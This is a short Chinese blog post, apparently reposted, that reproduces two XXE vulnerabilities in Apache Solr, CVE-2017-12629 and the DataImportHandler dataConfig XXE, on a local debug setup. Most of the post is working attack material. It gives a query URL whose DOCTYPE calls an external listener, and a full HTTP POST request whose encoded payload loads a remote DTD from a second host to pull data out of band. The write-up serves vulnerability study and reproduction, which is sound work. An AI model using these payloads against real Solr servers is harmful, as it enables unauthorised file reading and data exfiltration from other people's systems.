内容简介:进入IDEA中配置只复现两个XXE漏洞
进入 lucene-solr\solr\bin
文件夹中,运行 solr start -p 8988 -f -a "-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8988"
IDEA中配置 -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8988
漏洞复现
只复现两个XXE漏洞
CVE-2017-12629
solr create -c test # 创建核心test
payload:
http://localhost:8988/solr/test/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'}
Solr DIH dataConfig参数XXE漏洞
solr create -c test # 创建核心test payload请求: POST /solr/test/dataimport?_=1551604400819&indent=on&wt=json HTTP/1.1 Host: 127.0.0.1:8988 Pragma: no-cache Origin: http://127.0.0.1:8988 Accept-Language: zh-CN,zh;q=0.9 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36 Content-type: application/x-www-form-urlencoded Accept: application/json, text/plain, */* Cache-Control: no-cache Referer: http://127.0.0.1:8988/solr/ Connection: close Content-Length: 269 command=full-import&verbose=false&clean=true&commit=true&optimize=false&core=test&dataConfig=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E %3C!DOCTYPE+root+%5B%3C!ENTITY+%25+remote+SYSTEM+%22http%3A%2F%2F127.0.0.1:8082%2Fftp_xxe.xml%22%3E%25remote%3B%5D%3E
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- 漏洞分析:OpenSSH用户枚举漏洞(CVE-2018-15473)分析
- 【漏洞分析】CouchDB漏洞(CVE–2017–12635, CVE–2017–12636)分析
- 【漏洞分析】lighttpd域处理拒绝服务漏洞环境从复现到分析
- 漏洞分析:对CVE-2018-8587(Microsoft Outlook)漏洞的深入分析
- 路由器漏洞挖掘之 DIR-815 栈溢出漏洞分析
- Weblogic IIOP反序列化漏洞(CVE-2020-2551) 漏洞分析
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
